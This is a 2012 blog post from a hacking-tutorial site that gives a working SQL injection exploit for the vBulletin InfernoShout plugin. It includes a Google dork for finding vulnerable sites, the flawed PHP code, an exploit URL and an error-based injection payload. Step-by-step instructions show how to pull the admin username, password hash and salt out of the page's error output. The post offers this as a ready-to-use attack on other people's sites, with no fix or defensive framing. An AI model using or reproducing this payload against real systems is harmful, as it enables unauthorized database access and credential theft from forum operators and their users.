Sunday, August 19, 2012
infernoshout.php & inferno_settings.php #
go google and search :
Dork : inurl:infernoshout.php
Vulnerable code
--------------------------------------------------------------------------
$commands = unserialize($this->settings['s_commands']); |
if ($this->vbulletin->db->affected_rows() < 1 && !$this->vbulletin->db->query_first("select * from " . TABLE_PREFIX . "infernoshoutusers where s_user='{$this->vbulletin->userinfo['userid']}'")) |
$this->vbulletin->db->query(" |
insert into " . TABLE_PREFIX . "infernoshoutusers |
({$this->vbulletin->userinfo['userid']}, '" . serialize($commands) . "') |
}
-------------------------------------------------------------------------
Exploit link
http://site.com/infernoshout.php?do=options&area=commands
-------------------------------------------------------------------------
SQL Injection Code :
-------------------------------------------------------------------------
' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#
--------------------------------------------------------------------------
Insert SQL injection into the first "Command Input" box and enter anything into the first "Command Output" box, hit save settings, you will be treated with a database error, view the page source and scroll to the bottom of the page, you will see some quoted text containing the data you want. |
-------------------------------------------------------------------------
Video Tutorial :
http://www.youtube.com/watch?v=g70_JaKnBbw |
------------------------------------------------------------------------
|
- Copyright ©
.Hacking Cracking Tricks And Tutorials, Paid Scripts, Latest Exploits, 0Day Vulnerability, - Skyblue - Powered by Blogger - Designed by Johanes Djogan -
